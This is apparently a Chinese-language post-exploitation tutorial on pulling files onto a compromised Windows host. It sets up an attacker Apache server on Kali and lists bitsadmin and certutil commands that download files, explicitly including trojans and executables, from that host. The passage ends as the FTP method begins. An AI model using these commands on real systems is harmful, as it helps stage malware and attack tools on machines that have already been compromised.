后渗透系列——下载文件(Windows篇)
后渗透是指已对目标服务器有shell交互后的操作,通常包含权限维持、提权、内网渗透、一键拿域控。
本篇文章主要讲解后渗透准备工作——下载文件的方式,文件可以是木马、工具等等(任意文件皆可),为了方便演示,文件为test.txt。
1.准备工作
首先需要架设服务器,并把要下载的文件部署在服务器上,笔者用的服务器为Kali Linux架设,ip地址是192.168.1.103。
输入命令:service apache2 start //启动Apache
输入命令:vim /var/www/html/test/test.txt //创建文件(可以是木马、工具等任意文件)
服务器端架设完成,准备工作就到这里,下文开始演示Windows除网页下载文件的一些方法。
2.下载文件
(1)Bitsadmin
此命令只能下载文件到本地磁盘上。
使用方法:
第一种
bitsadmin /transfer myjob1 /download /priority normal http://192.168.1.103/test/test.txt C:\Users\snowwolf\Desktop\test.txt
第二种
bitsadmin /rawreturn /transfer getfile http://192.168.1.103/test/test.txt C:\Users\snowwolf\Desktop\test.txt
第三种
bitsadmin /rawreturn /transfer getpayload http://192.168.1.103/test/test.txt C:\Users\snowwolf\Desktop\test.txt
第四种
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.103/test/test.txt" "C:\Users\snowwolf\Desktop\test.txt"
支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10
(2)Certutil
Windows程序用于处理证书
使用方法:
certutil.exe -urlcache -split -f http://192.168.1.103/test/test.exe test.exe
会将exe文件下载到当前目录
支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10
(3)FTP
文件传输协议,Windows可以直接搭建FTP服务器,所以这里ip地址是Windows的ip
使用方法:
第一种方式——交互式下载